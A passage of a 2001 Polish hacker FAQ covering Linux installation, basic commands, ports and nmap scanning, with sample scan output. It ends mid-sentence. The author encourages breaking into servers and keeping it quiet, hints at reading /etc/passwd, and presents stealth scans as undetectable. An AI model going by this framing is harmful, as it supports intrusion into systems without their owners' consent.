Linux, skanery i nie tylko


Marqs faq Markus@poczta.fm

2.01.2001
Wszystkie zawarte ponizej informacje sa podane w celach edukacyjnych
i nie ponosze odpowiedzialnosci za czyny wylowane z uzytkowaia nimi.
"A zreszta robta co chceta
I nie dajta sie zlapac"




Marqs minds:/ faq




Spis tresci
1. O autorze czyli o mnie
2. Czym rózni się hacker od krakera
3. Najwieksi Hackerzy i Krakerzy
4. Hacking poczatki pocztków
5. LINUX dla czego ten system
6. Wybor dystrybucji
7. Kontabilność sprzętu w LINUXIE
8. Instalowanie systemu RED HAT
9. Konfiguracja RED HATA
10. Podłanczanie do NETU przez TELE_PSY
11. Instalowanie systemu SLACKWARE
12. Polecenia systemu LINUX
13. Opis Portów
14. Skanery serwerów
15. Skaner nmap
16. Skaner nessus
17. Skaner sendmaili od FAQ SLABIKA
18. Sendmail co to wogole jest?
19. Wysylanie fakemaili
20. Explolity do sendmaila
21. Pozdrowienia
22. Zakonczenie










1. O autorze czyli o mnie.
Cze nazywam się Marqs ljestem początkującym Hackerem i Phreakerem. Jest tu mój pierwszy tekst ten dla Ciebie może wydawac się napisany
lamersko ale zawsze warto spróbować, może akurat się komuś ten tekst spodoba a wogóle to pisze ten tekst bo mi się strasznie nudzi.
Większosc tekstów są autorstwa mojego ale zdażają się takie które są zamieszczone z innych źródeł lecz zaznaczam tam ich autorów.
Możecie mnie znalesć na kanałach #Phreakpl, #Hackerspl, #Hackingpl, www.kon.pl oraz kontakt przez emaila zamieszczonego wyżej.
To tyle na wstęp. Jazda

2. Czym różni się hacker od krakera

Haker to osoba zafascynowana arkanami wiedzy o komputerach.
Często jest programistą. Wie dużo o systemach operacyjnych i językach programowania.
Znajduje luki w systemach i przyczyny ich powstawania. Nieustannie zdobywa nową wiedzę i dzieli się z nią
z innymi. Co istotne, nigdy nie niszczy celowo danych.

Kraker (włamywacz) włamuje się lub w inny sposób narusza bezpieczeństwo komputera zdalnego. Po uzyskaniu
nieautoryzowanego dostępu niszczy kluczowe dane, zamyka dostęp prawowitym użutkownikom i
ogólnie przyczynia się do powstawania problemów. Krakera jest łatwo poznać: kierują nim złe pobudki.:-)

3. Najwięksi Hackerzy i Krakerzy
Richard Stallman
Stallman został pracownikiem Laboratorium Sztucznej inteligencji MIT w roku 1971. Za wkład w dziedzinę oprogramowania otrzymał nagrodę McArthur Genius w wysokości 250 tysięcy dolarów.
Założył Fundację Darmowego oprogramowania (free Software Foundation), w ramach której stworzono setki nieodpłatnych narzędzi dla platformy UNIX. Zwykł pracować na nieco archaicznych maszynach, w tym na PDP-10 firmy DEC (do którego pewnie wciąż ma gdzieś dostęp).

Dennis Ritchie, Ken Thomson i Brian Kernighan
Ritchie, Thompson i Kernighan to programiści firmy Bell Labs; im zawdzięczamy istnienie systemu Unix i języka C. Bez tej trójki nie było by internetu (albo byłby duzo mniej funkcjonalny). Ciągle są aktywni. Naprzykład Ritchie pracuje nad systemem Plan9, który być
może zajmnie miejsce UNIX-a jako standartowego systemu dla sieci komputerowych.

Paul Baran, Rand Corporation

Paul Baran to prawdopodobnie najznakomitrzy Hacker w historii- zajmował sie internetem jeszcze zanim zaczął istnieć! Rozpracowywał samą ideę sieci globalnej i stworzył podstawy, na których oparli się jego następcy.

Eugene Spafford
Spafford jest znanym i cenionym profesorem informatyki Uniwersystetu Purdue. Miał ogromny
wkład w powstanie systemu bezpieczeństwa COPS, Płautomatycznej procedury zabezpieczenia sieci. Spafford wykształcił niejednego wybitnego specjalistę i jest figurą bardzo poważną w kręgach informatycznych.

Dan Farmer
Przebywając na Uniwersytecie Carnregie Mellon jako członek grupy CERT Farmer pracował ze Spaffordem nad systemem COPS. Potem Farmer zyskał złą(?)sławę tworząc program skanujący SATAN, potęrzne narzędzie do analizy zdalnych sieci na występowanie luk w bezpieczeństwie.

Wietse Venema
Venema jest pracownikiem Inststytutu Technologicznego w Eindhowen w Holandii. To niezwykle utalentowany programista, stworzył niejedno narzędzie określone mianem standardu przemysłowego. Był wspóautorem SATAN-a i napisał program TCP Wrapper - często używane narzędzie słuzące do monitorowania przychodzących pakietów danych.

Linus Torvalds
We wczesnych latach dziewiędziesiątych Torvalds zapisał się na zajęcia z systemu Unix i języka C. Rok puxniej sam zaczął tworrzyć system na podobieństwo UNIX-a. Został on opublokowany w internecie pod nazwą Linux. Dziś wokół linuxa utworzyło się coś w rodzaju kultu. Jest jedyny system w historii napisany przez niezależnych programistów z całego świata -wielu z nich nigdy się nawet nie widziało. Linuxa nie chronią prawa autorskie w zakresie takim, jak w przypadku innych systemów operacyjnych i jest dostępny darmowo.

Bill Gates i Paul Allen
Ci panowie z waszyngtonu programowali od lat licealnych. Obaj posiadali ogromny talent. Zaczynająć w roku 1980, zbudowali największe imperium programistyczne na kuli ziemskiej. Do komercyjnych osiągnięć Microsoftu należą:MSDOS,Windows,Windows95 i WindowsNT.
NIKT ICH NIE LUBI:-)


Kevin Mitnic (MÓJ IDOL)
Mitnic znany jako Condor, to chyba najsłynniejszy kraker świata. Karierę zaczął jako phreaker. Od tamtych lat udało mu się włamać do najbardziej zabezpieczonych serwerów, a w tym komputerów wojskowych, korporacji finansowych, firm programistycznych itd. (Już jakio nastolatek włamał się do Dowództwa Północnoamerykańskiej Obrony lotniczej). Jak chcecie mogę wam podesłac zajebisty tekst o Kevinie tylko mail me.


Kevin Poulsen
Idący w ślady Mitnika Poulsen zasłynął z czynu graniczącego z czarną magią: przejęcia kontroli nad systemem telefonicznym Pacific Bell. Pewnego razu dzięki swym umiejętnością "wygrał" konkurs radiowy, w którym główną nagrodę stanowiło Porsche. Zrobił tak żeby to właśnie jego telefon wygrał. On również włamywał się do jarozmaitrzych werwerów, ale najbardziej upodobał sobie te zawierające informacje dotyczące obrony narodowej. Pięć lat spędził w więzieniu. Wyszedł na wolność w 1996 roku

Justin Tanner Peterson

Znany jako agent złodziej (Agent Steal), Peterson zasłynął z włamania do instytucji przydzielającej kredyty konsymenckie. Po złapaniu wsypał swoich znajomych, między innymi Kevina Poulsena. Następnie tajnie pracował do FBI. Dzięki temu udało mu się wyjść na wolność-ale uciekł od pracy tajnego agenta i znów zaczął rozrabiać. Ostatnim wyczynem była nieudana prośba dokonania przez INTERNET fałszywej transakcji opiewającej na setki tysięcy dolarów

4. Hacking początki początków
Podpowiem tu wam jak potroszku stać się hackerem nie jest to złoty przepis działający w 100% ale zawsze trzeba od czegoś zacząć przynajmniej ja tak myśle bo nie ma osoby co by od razu wiedziała jak zdobywac roota na jakimś unixowym serwerku. Na początku radził bym Ci zainstalować jakiegoś Linuxa w następnym rozdziale będe opisywał jak instalowac i jaką dystrybucje wybrać. Najlepiej wedłóg mnie zainstalować I linuxa i windowsa na jednym dysku. Trzeba by też sie nauczyć języka angielskiego bo bez tego naprawdę ani rusz może wam będzie szkoda czasu na to lub go też nie macie ale radzę wam się go nauczyc przyda wam sie on tak samo w Hackingu jak i w normalnym świecie. Zacznijcie czytać różne faq o tematyce hackingu nawet jak nie będzie to związane z tym co chcecie się uczyć bo kiedyś i tak wam może się to przydac. Bądzcie ostrożni aż do przesady nie rozgadujcie ludziom jacy z was Hackerzy bo może to się roznieść po okolicy ktos się dowie kto nie powinien i już macie przepierdol. A jak się już chwalicie że włamaliście się na jakąś stronę np.Telekomunikacji;-) (Telewsiarze) to gadajcie to cicho i zaufanym osobom. A podstawą do sukcesu jest ciężka praca i nierezygnujcie z powodu że nieudało wam się wam włamać na jakiś serwer tylko próbujcie dalej kiedyś się wam uda i będziecie się z tego bardzo cieszyć.
Myśle że to są podstawy do stania się potroszku Hackerem jak dotarliście dotąd to już jest dobrze dobra kończe te ględzenie od rzeczy więc zaczynamy.


5. Linux dlaczego ten system
Dlatego że system ten ma głównie wykorzystanie w serwerach sieciowych i ogólnie na nim się w sieci wszystko opiera. Jest to system w przeciwnieństwie do jakiegoś gówna co nazywa się windows po naszemu shitt. W systemie tym trzeba wiekszość rzeczy ręcznie konfigurować i to w tym systemie kocham można wszystko skonfigurować według własnych potrzeb usługi sieciowe i inne ale to w dalszych rozdziałach.
6. Wybor dystrybucji
Na rynku znajduje się dużo dystrybucji(około 15) opartych na Unixie główne z nich to:Red hat, FreeBSD, Slackware, Debian, SuSE
7.Kontabilnosc sprzetu w LINUXIE
linux pracuje praktycznie na karzdym sprzęcie z procesorem Intel typu 386 lub nowszym. Musisz mieć Cd-rom i dystrybucje na płycie:-)
Bez grafiki pracuje (ślamazarnie) przy 4 mb
Z grafiką linux uruchomi się już przy 8mb ale przy 16 grafika działa znacznie szybciej
8.Instalacja dystrybucji RED HAT
Dobra dotarłeś dotąd to już jest dobrze zaczynamy instalować linuxa RED HAT najlepiej zrób sobie mocną kawę i usiądź wygodnie na krześle bo zajmnie Ci to trochę czasu.
Uruchom swojego kompa i wejdź do biosu ustaw automatyczne bootowanie na Cd -rom jeśli tego nie masz będziesz musiał utworzyć dyskietki startowe. Jak masz bootowanie z cd-romu to włurz płytę instalacyjną z systemem linux i zrestartuj kompa po chwili wyswietli Ci się parę komunikatów związanych o bootowaniu. Wyświetli Ci się menu jaką wersje instalacyjną wybrac masz kilka możliwości. możesz od razu nacisnąc enter program spróbuje wykryć twoją karte graficzną i myszkę a następnie uruchomi instalator graficzny. jeżeli masz nietypową kartę graficzną możesz wybrać w menu text i również nacisnąć enter wówczas uruchomi się instalator znany z poprzednich wersji ostatnim trybem instalacji jest expert jest to chyba najleprzy wybór możesz sam wszystko ustawić wybrac pakiety do instalacji. Ja tak robiłem i wam też radzę będe opisywał jak to się robi krok po kroku. Po naciśnięciu enter do pamięci zostanie załadowane jądro systemu , a następnie na ekranie pojawie się informacje dotyczące podzespołów komputera. Jak znasz język angielski to bez problemu powienienieś poradzić sobie z instalacja poniewaz instalator krok po kroku prowadzi użytkownika. W pierwszym etapie instaltor spróbije zrobić dyskietki startowe ja jeszcze tego nie robiłem więc pomiń to i jedź dalej puźniej musisz wybrać język narodowy zdefiniować rodzaj klawiatury i rodzaj myszki.
Teraz możesz wybrać sposób konfiguracji systemu. Pierwsze dwa typy to Gnome workstation i KDE workstation. Zainstalowane zostaną aplikacje typowe do stacji roboczej programy graficzne edytory tekstu itp. Obje konfiguracje różnią się pulpitem dla X- Window. Do wyboru mamy dwa konkurencyjne rozwiązania : KDE i Gnome. W trakcie instalacji jako serwer zainstalowane zostaną przede wszystkim serwery usług sieciowych. Możemy również wybrać czwarty typ instalacji najleprza i polecam -CUSTOM.
W tym, przypadku sami określamy liczbe i wielkosc partycji oraz aplikacje które mają być zainstalowane.
Teraz możemy przystapić do założenia partycji linuxowskich. Możemy to zrobić używając dwóch programów do tego przyznaczonych które są załączone do wersji instalacyjnej systemu linux. Są to programy Disk Druid, oraz drógi program Fdisk specjalna wersja pod linuxa. Opisze tu potroszce zakładanie partycji przez te obydwa programy.
Najpier musimy się zastanowić ile partycji będziemy chcieli czy będzie tam zainstalowany tylko system linux czy także inny system. Konieczne jest założenie partyji wymiany tzw. swap. Jej wielkość jest uzależniona od ilości aplikacji które będziesz miał zamiar uruchamiać. Najczęciej partycja ta zajmuje dwa razy więcej od pamięci RAM. Napisze w jakich katalogach co jest instalowane. /usr instalowane tu są wszystkie aplikacje które wybierzemy. Jeśli zdecydujesz się na wydzielenie osobnej partycji na ten ktalog powinna ona zajmować okolo 700 - 1000 mb pzynajmniej ja tak mam ale to będe zmieniać. W katalogu /var znajdująs ie między innymi logi systemowe oraz Emaile. Jak masz założone grupy dyskusyjne to możesz sobie nawet tam dać do 500 mb ale nie wiem czy będzie Ci to potrzebne w zupełności wystarczy 200-300 mb. w katalogu /tmp jasne jak w windzie znajdują się tam pliki tymczasowe. W katalogu /home najlepiej jest te katalog dac na osobnej partycji. Należy pamiętac przy tworzyniu partycji o zasasdzie by system mógł się prawidłowo uruchamiać z dysku twardego jego jądro musi się znajdowac poniżej 1024 cylindra dysku. Jądro sysemu zapisane jest w katalogu /boot pozostałe partycje moga znajdowac się w dowolnym miejscu na dysku.W Disk druidzie pozwala na dodawanie partycji w bardzo łatwy sposób. Natomiast Fdiks jest bardziej skomplikowany ale ma więcej możliwości możemy zapomocą niego dodawać różne partycje na przykład do zainstalowania systemu linux i windows na jednym dysku nie będe tu tego pisal jak ktoś będzie chciał wiedzieć do Email do mnie. Komendy to tworzenia partycji w programie FDisk.
m - pomoc
p - wyświetlanie insforamacje o partycjach któe są aktualnie na naszym dysku
n - dodanie partycji
d - usunieącie partycji
t - zmiana typu partycji
a - wybór partycji aktywnej
w - zapisanie zmian i wyjście z programu
q - wyjcie z programu bez zapisywania zmian
Po podzieleniu parycji instalator zapyta nas które partycje mają być sforamtowane.
Potem będziemy podawać informacje dotyczące uruchamianie się naszego systemu. Będziemy decytować czy ma być utworzona dyskietka startowa przydatna przy awarii systemu. Ustalamy gdzie ma być linux loader czyli LILO mamy dwa wyjścia możemy go umieścić MBR lub umieszczenie lilo w pierwszych sektorach dysku tak zrób. Jeśli instalator wykrył naszą kartę sieciową chodź mało to się zdarza należy podać maskę sieci adres Ip adres bramki nazwe komputera. Puźniej trzeba podać strefe czasową w której się znajdujesz u nas warsaw. Potem trzeba podac hasło root czyli admina systemu czyli Ciebie oraz konto użytkownika i hasło oraz włączyć shadow Psswords. Potem musisz wybrac aplikacje które mają zostać zainstaliwane na twoim kompie. W tym Ci nie moge zabardzo pomóc ponieważ nie wiem do czego dokładnie będzie Ci służył twój komp czy tylko do hacku czy także do robienia animacji:-) żatuje ale jest taka zasada im więcej aplikacji mamy zainsalowanych tym nasz komp jest bardziej podany na atak a co za tym idzie admin może dowiedzieć się o tobie dużo rzeczy lub jakiś hacker będzie chciał udowadnić jaki jest dobry i próbować się włamać do twojego kompa. Dobra teraz komputer zacznie instalować wybrane przez Cibie pakiety masz trochę czasu więc idź zrobić sobie kawę bo chyba pierwsza już Ci się skończyła. Zinstalował się twój system zrestartuje Ci się komp wyciągnij płytę z linuxem zmień bootowanie na normalne czyli na C-d-e czy jak tam miałeś ustawione. jak zmienisz to uruchom kompa i zobacz jak nie chce się uruchamiać będzie pisać brak systemu czy coś takiego to zobacz czy masz ustawioną odpowiedznią partycje aktywną jak już zobaczysz że będzie Ci pisać taki coś jak BOOT w dole ekranu to naciśnij na tab i zobaczysz jakie systemy masz aktualnie zainstaowane jak tylko linuxa to będzie pisać linux a jak także windowsa to będzie pisac także dos. Wpisz Lilux i zacznie się uruchamiać twój piękny system linux wyświetlone zostaną liczn ekomunikaty dotyczące sterowników i uruchamianych programów. Jak to się skończy to program poprosi Cię o podanie hasła możesz się zalogować jako root lub zwykły użytkownik wpisujesz root enter potem hasło uważaj nie będzie ono widoczne na ekranie nawet w postaci gwiazdek jak wpiszesz hasło enter i jestes juz w systemie.
To koniec na temat instalacji teraz trzeba się wziąść za konfuguracje naszego "pingwina".
9)Konfiguracja RED HATA
Dobra zaczynamy najpierw podam ja sobie skonfigurować sobie X-y karte dźwiękową mouse jak wyłączyć usługi które nie będą nam potrzebne.
Najpierw trzeba by skonfigurować X-window. Zaloguj się jako użytkownik Root i wpisz następujące polecenie Xconfigurator gdy pojawi się ekran informacyjny , wybierz przycisk Ok aby kontynuować. W oknie dialogowym Choose a Card wybierz kartę graficzną jaką posiadasz a potem Ok. powybraniu karty graficznej pojawi się okno dialogowe Monitor Setup po wybraniu monitora kliknij ok lub ustaw sobie ręcznie parametry jak nie ma twojego modelu monitora. Puźniej pojawi Ci się menu w którym musisz podać ile twoja karta grafiki ma pamięci. Jeśli trzeba podaj informacje na temat Ramdac najczęściej jednak ustaw No RAMDSc. Jeśli pojawi Ci się okno z Clockchip Configuration podaj parametry układu zegarowego. Najczęściej będziesz wybierać NO CLOCKCHIP Setting. W następnym oknie musisz wybrać odpowiednią dla Ciebie rozdzielczość. W oknie StartingX wybierz ok. Program konfiguracyjny sprawdzi nowe ustawienia jeśli zostało wszystko dobrze skonfigurowane , wtedy pojawi się ramka z malym oknem dialogowym, Jeśli widzisz okno X do super wybierz przycisk yes jeśli nie to po paru sekundach zowu pojawi Ci sie okno konfiguracyjne i będziesz musiał wprowadzić korekty. Jeśli wszystko dobrze skonfigurowałeś to w trybie txt-towym wpisz komende startx wtedy ekran zacznie migać gasnąć i pochwili powinien pojawic Ci się X-window. Super skonfigurowałeś grafike teraz by cza skonfigurować sobie dźwięk po podczas wpisywania hasła root na innym serwerku cza by czegoś słuchać. w wierszu TXT wpisz polecenie /usr/sbin/sndconfig albo same Sndconfig jak to nie pujdzie to napisz do mnie list bo prawdopodobnie Brakuje Ci parę pakietów powiem Ci jakie. a jak pojawiło się okno Sound Configuration to znaczy że masz te pakiety i możemy konfigurować twoją karte muzyczną . Kliknij Ok pojawi się okno dialogowe gdzie można wybrać model karty muzycznej. Wybierz swoją karte graficzną lub model z nią zgodny. Może ale nie musi pojawic Ci się okno Card Setting będziesz musiał się trochę namęczyć i wykazać wiedzą o swoich adresach portów WE-Wy, przerwania i inne pierdoły módl się żyby Ci się to nie pokazało chyba masz kartę "Plug and Play" podłącz i módl się coś takiegoi to znaczy. Puźniej pojawi Ci się komunikat że plik zostanie zmieniony i takie tam ostrzeżenia kliknij ok. Puźniej pojawi CI się okno SoundCard Test będzie próbował odtworzyć próbkę dźwięku zrób se głośnik na Vol bo u mnie był ten dźwięk marnie był słyszany. Jeśli usłyszysz dźwiek to hurra twoja karta muzyki działa i możesz słuchac MP3 oczywiście legalnych:-). Dobra pewnie wszystko już jest skonfigurowane acha w trybie tekstowym jest taki Cnif nigdzie jeszcze nie widzialem żeby był opisany wystarczy wpisać Setup i tam można wszystko zmieniać ustawienia X karty dźwiękowej modelu myszki, rodzaj klawiatury itp.
10). Podlanczanie do netu
podlanczanie do sieci można zrobić w kilka sposobów mozna w tym celu użyć skryptów, minicoma,lub uruchomić w X napise tu sposób ten ostani ponieważ jeszcze nie opanowałem Minicoma do końca opisze w następnym faq jak się komunikowac przez minicoma i jak sobie napisać własny skrypt. opisuję tu konfiguracje KDE zaczerpniętą z faqUNIX(LINUX) HACKING/SECURITY
Upewnij się czy masz zinstalowany ppp (point - to -point Protoloc)
uruchamiając YaST jeśli nie to doinstaluj koniecznie bo bez tego nie pobawisz się w necie. Następnie w KDE uruchamiasz Kppp poprzez Menu-->Internet-->KPPP. Włączasz setup i w pierwszej zakładce Accounts robisz nowe konto np. TPSA. Wtedy włączy się nowe okno konfiguracyjne. Najpierw ustawiamy "dial"
Connection name:TPSA
Phobne Number :0202122 Authentication: Terminal-based
resztę zostawiamy. W zakładce "IP" musimy ustawić na Dynamic IP adres. Dalej w"DNS" wpisujemy adresy DNS`ow BARDZO WAŻNE!
194.204.159.1
194.204.152.34
I jeszcze w zakładce "Login script" edytujemy `GoNzo Scipt``
Except Password
Expcept sername
send ppp
Except password
send ppp
pause 2
Dobrze skonfigurowane konta zakończone teraz przechodzimy do zakladki "divice" jeśli modem był już wcześniej wykryty nie ma problemu, sprawdzamy pod którym portem jest modem jeśli mamy go pod Com4 w windowsie to tutaj nastaw na /dev/cua3. niżej jest "Flow control" ustwaiamy sterowanie prepływem albo hardwarowo albo softwarowo u mnie akurat to wszystko jedno. Line termination CR/LF. Connection speed bez obaw ustaw sobie na 11500. W dalszej zakładce modem dowiedzieć możemy się jakiego rodzaju mamy modem w zakładce ppp jest kilka opcji sam sobie ustawisz. Wciskamy OK a potem już Connect i pochwili jeśli linia nie będzie zajęta co często się zdarza (ukłony w stronę TPSA) będziemy w necie.
11. Instalowanie dystrybucji SLACKWARE
Tak samo jak wersja RED HAT tak samo SLACKWARE zaczniemy instalować z płyty. Najpierw trzeba zminić bootowanie w BIOS wybieramy menu Features Setup aby pierwszy bootowany był CD-rom. jeśli to zrobiliśmy
zapisujemy zmiany. Wkładamy wersje instalacyjna SLACKWARE do napędu CD-rom i uruchamiamy ponownie nasz komp. Po ponownym uruchomieniu komputera na naszym monitorze pojawi się znak zachęty BOOT: naciskamy Enter. Po ujrzeniu kilkunastu komunikatów pojawi sie text slackware login czyli że musisz się zalogować wpisz root i nacisnij enter. Wyskoczy kilka opcji z ktorych mozesz wpisac
- cfdisk oraz fdisk programy te sluza do partycjonowania dyskow. Ja uzywam fdiska wiec napisze tu polecenia do tego programu (nie wiem po co sa wyzej ale co mi tam)
Komendy to tworzenia partycji w programie FDisk.
m - pomoc
p - wyświetlanie insforamacje o partycjach któe są aktualnie na naszym dysku
n - dodanie partycji
d - usunieącie partycji
t - zmiana typu partycji
a - wybór partycji aktywnej
w - zapisanie zmian i wyjście z programu
q - wyjcie z programu bez zapisywania zmian
Przykladowy podział partycji z uzyciem programu fdisk
/dev/hda1 82 linux swap
/dev/hda2 83 linux native
/dev/hda3 83 linux native
Musisz tam podać ilość miejsca na partycje nie chce mi sie tego wszystkiego opisywac wiec jak nie bedziesz wiedziec czegos to napisz do mnie EMAILA
- " Pcmia" nastapi uruchomienie urzadzen korzystajacych z tych magistrali
- "network" zainstalowane zostana karty sieciowe niezbedne do uruchomiene sieci.
Do obu tych opcji bedziemy potrzebowali dodatkowych dyskietek spreparowanych z obrazow odpowiednio pcmia.dsk, network.dsk.
JA TO OLEWAM OPROCZ PARYCJONOWANIA potem skonfigurujesz siec.
Opcja Setup uruchomi wlasciwy instalator systemu. Pojawi Ci sie niebieskie tlo z ramka w srodku z opcjami do wyboru. znajduja sie tam opcje:
- HELP (chyba wiadomo) POMOC!!!
- KEYMAP definiusjesz tym swojej klawiatury
- ADDSWAP - program odszuka partycje SWAP utwozona wczesniej uaktywni ja oraz sformatuje.
- TARGET tutaj mozemy wskazac miejsce systemu plikow, w ktorych moga buyc podmontowane partycje linuxowskie lub np. FAT32.
- SOURCE tutaj okreslasz skad ma byc instalowany linux masz do wyboru CD-rom 9jak w naszym wypadku), z dysku twardego i pobieranie danych z sieci.
- SELECT wybieraz tu jakie pakiety maja byc instalowane.
Przechodzimy do wyboru aplikacji. Pierwsza opcja pozwala na instalacje wszystkich pakietow, Po wyborze drogiej opcji instalator bedzie sie zatrzymywal przy kazdym pakiecie i prosil o potwierdzenie. Opcja menu pozwala na wybor pakietow ktore maja byc instalowane.
Opcja EXPER pozwala decydowac o insytalacji nawet niezbednych elementow sysemu. Dobra wybierz interesujaca Cie opcje wybierz aplikajce ktore chcesz zainstalowac nacisnij enter a ja w miedzyczasie ide po cos do picia :).
Po zainstalowaniu aplikacji i pokaze Ci sie menu Make BOOtdisk mozna tam sformatowac dyskietke zrobic dyskietke startowa ja zawsze robie continue. Puzniej wybierasz na jakim Com-ie masz msz modem lub wybierasz ze go nie masz. Wybierasz rodzaje czcionki konsolo i naciskamy enter. Teraz jest najwazniejsza zecz aby komp nam sie uruchamial sie prawidlowo musimy skonfigurowac i zainstalowac LILO. Masz trzy wyjscia
- simple -automatycznie Ci skonfiguruje i zainstaluje LILO (polecam)
- expert - sam podajesz wszystkie parametry
- skip nie instaluje LILA (nie polecam):)
Potem wybierasz rozdzielczosc ja mam zawsze 1024*768*64k (best for X)
oraz gdzie zainstalowac lilo
ROOT -nie sprawdzalem
Floppy - formatuje i instaluje na dyskietce lilo
MBR - Instaluje w MASTER BOOT RECORD ( ja tak robie).
Po zainstalowaniu LILO wyswietli Ci sie opcja dotyczaca sieci jak masz to tak jak nie to nie :-)
Jak sobie skonfigurujesz siec zapyta Cie czy sprawdzic siec siec czy tez nie. Potaj wybierasz rodzaj myszki. Port do ktorego jest podlaczona. Konfigurujesz Sendmaila i wybierasz strefe czasowa dla mnie Europe/WARSAW. Oraz wyboierasz menadzer X-win. PolecmKDE. Oraz wpisujesz haslo dla siebie czyli roota.
Puzniej pojawi sie okno powiadajace o zakonczeniu instalacji. Musisz potem zrestartowac kompa poprzez nacisniecie klawiszy ctrl+alt+del.
Wyjmij plytke cdrom z napedu i jak pojawi Ci sie znak boot nacisnij enter zacznie uruchamiac Ci sie linux z charakteryzujacym pingwinem w rogo ekranu.

12) Polecenia systemu
Polecenia warto znać ponieważ w X-ach nie da sie wyszystkigo zrobić a wogóle to jest o wiele szybszy sbosób na poruszanie się w systemie. Napisze tu polecenia oraz opis do nich co ona znaczą.
pwd - podaje katalog w którym akurat się znajdujesz
ls - wyświetla krótki spis plików
ls -a -pokazuje spis plików włącznie z ukrytymi
cd - zmina katalogu np cd /etc/
cd.. - wraca do wcześnijszego katalogu
mkdir - tworzenie jednego lub kilu katalogów
rmdir - kasuje pusty katalog jag w kat znajdują się pliki najpierw trzeba je usunąć.
cp - kopiowanie plików
rm -usuwanmie plików
mv - zmina nazwy plików lub ich przenoszenie
cat - wyświetla zawartość pliku np. cat/etc/passwd :-)
cmp - porównywanie plików
df - pokazuje ilosc dostepnego miejsca
diff - pokazuje roznice miedzy dwoma plikami
finger - pokazuje informacje o danum uzytkowniku
ftp - wiadaomo (wpisanie ? pokazyuje wszystkie komendy)
telnet - tez wiadomo i to zo wyżej
irc- no comments
last - są to inforamcje na temat kiedy kto sie kiedy logował trzeba wpisać last [nazwa uzytkownika]
moun - sluzy do montowania dyskow i cd-romow
passwd - zmiana hasla
reboot - restart linucha
halt - wylanczanie kompa
talk - program do poruzumiewania się miedzy uzytkownikami
tar - archiwizacja plikow
tar -xcf -rozpakowywanie pliku
tar -cvf -pakowanie pliku
13) Porty
FTP - 21
Telnet - 23
Sendmail, SMTP - 25
Gopher - 70
finger - 79
HTTP obsłógujący sieć WWW - 80
Usenet (NNTP) - 119
TFTP - 69
systat - 11
netstat - 15
X-y -600
14. Skanery serwerow
Dobra zainstalowałes sobie już linuxa i masz pojęcie o nim (tak myślę) to trzeba by się wziąść do robienia jakiś ciekawych rzeczy.
a) Skanery (nie mylcie ze skanerem do skanowania)
Skanery są to programy które pomagają nam Hackerom do wyszukiwania źle skonfigurowanych systemów. Skanery można podzielić na systemowe i sieciowe. Skanery systemowe sprawdza host lokalny w poszukiwaniu luk w bezpieczeństwie, natomiast skanery sieciowe sprawdzją hosty przez łącza sieciowe i poszukują jakie porty są aktywne jakie aplikacje są zainstalowane na danym komputerze które można wykorzystać do ataku. Poniżej opisze działanie różnych skanerów zarówno sieciowych jak i systemowych większość z nich dostępne są w internecie postaram się podać adresy w których się znajdują oraz najciekawsze z nich zamieszcze na swojej stronie internetowej.
- check.pl
Jest to program napisany w perlu. Zalicza się on do skanerów systemowych. Skanuje system sprawdzając prawo dostępów do plików i wypisuje potencjalne luki bezpieczeństwa. Rapory możemy przegladać odrazu lub zapisac go w pliku i obejżeć puźniej.
- Logchek
Skanuje zawartość logów systemowych w poszukiwaniu wpisów mogących zagrozić systemowi. Można tak sobie go skonfigurować, i zdefiniować teksty jakie mają znaleść się w logach by były zaliczone np. Do źle skonfigurowanego.
- Satan jest to program dokonujący zdalnego testu serwera, w poszukiwaniu błedów w konfiguracji. Od dłuższego czasu program ten nie rozwija się ale zawsze dobrze mieć go pod ręką
- nmap
Jest to doskonale narzędzie do skanowania systemoiw. Można go uruchomić i w taksie jak i w X-ach trzeba wtedy ściągnąć odpowiednią wersje. Program ten ma duże możliwości. Można skanować kmputery w poszukiwaniu na otwarte porty w rózne sposoby.
-Nessus
Doskonałe narzędzie do skanowania serwerów i całych sieci. Zawiera zestaw "pluginów" wraz z możliwościami dodania nowych. Interfejs pozwala na wybranie spośród dużej gamy ataków które nas interesują.
15.Opisze tutaj instalacje, konfiguracje oraz jak uzywac dwoch
najpopularniejszych skanerow sieciowych. Instalacja jest banalna dostepne sa w
pakietach rmp oraz w wersji taz.gz. W sieciach dostepne sa
nmap-2.53-1.i386.rpm jest to pakiet gotowy do zainstalowania,
nmaop-2.53-1.src.rpm jest to kod zrodlowy programu,
nmap-frontend-0.2.53-1i386.rpm jest to graficzna nakladka oraz oryginalne
xrodla w postaci tar.gz. Po zainstalowaniu programu ja uzywam wersji TXT czyli
pierwszej ktora wyzej opisalem. Nalezalo by ja uruchomic ,uruchamia sie ja
poleceniem nmap w oknie terminalu. Napoczatku radzilbym Ci sie z nim
zaznajomic na wlasnym kompie.Jesli nie zmieniles ustawien sieciowych nazwy
hosta i Tc/IP to pewnie masz domyslne czyli adres IP 127.0.0.1 i nazwa hosta
"localhost"
aby uruchomic skaner by zeskanowac swoj komp nalezy wpisac nmap localhost lub
nmap 127.0.0.1. I wyskoczy Ci po chwili jakie porty sa u Ciebie aktywne. W
programie tym znajduje sie duzo opcji ktore mozna zastosowac podczas
skanowania oto czesc z nich:
-b wykorzystuje funkcje ataku skokowego
-f wysylane sa sfragmentowane pakiety
-F sprawdzanie standardowych uslog ktore sa zapisane w pliku etc/services
-l pobiera informacjeprzez idend
-n wylacza wyszukiwanie DNS
-v dodatkowe informacje
-sS utajnione skanowanie portow
-sF Skanowanie utajnione . pozwala na skanowanie spoza zaory sieciowej. Skaner
pozostaje niewykrywalny dla takich programow jak courtney czy syslogger
-sT Skanowanie portow za pomoca funkcji TCP connect
Zapomoca tych funkcji idzie zrobic bardzo ciekawe rzeczy dowiedziec sie jaki
jest system zainstalowany na danym servie oraz numer kernela. Na dole
zamieszczam efekty takiego skanowania.
Initiating TCP connect() scan against fiorek.linux (160.100.58.0)
Adding TCP port 515 (state open).
Adding TCP port 111 (state open).
Adding TCP port 6000 (state open).
Adding TCP port 3001 (state open).
The TCP connect scan took 0 seconds to scan 1523 ports.
For OSScan assuming that port 111 is open and port 1 is closed and neither are firewalled
Interesting ports on fiorek.linux (160.100.58.0):
(The 1519 ports scanned but not shown below are in state: closed)
Port State Service
111/tcp open sunrpc
515/tcp open printer
3001/tcp open nessusd
6000/tcp open X11

TCP Sequence Prediction: Class=random positive increments
Difficulty=4130664 (Good luck!)

Sequence numbers: 725D107C 725D107C 72C2B539 72C2B539 722E3D1C 722E3D1C
Remote operating system guess: Linux 2.1.122 - 2.2.14

Z zastosowaniem funcki -v -sS -O dowiedzialem sie Ciekawych zeczy jak np
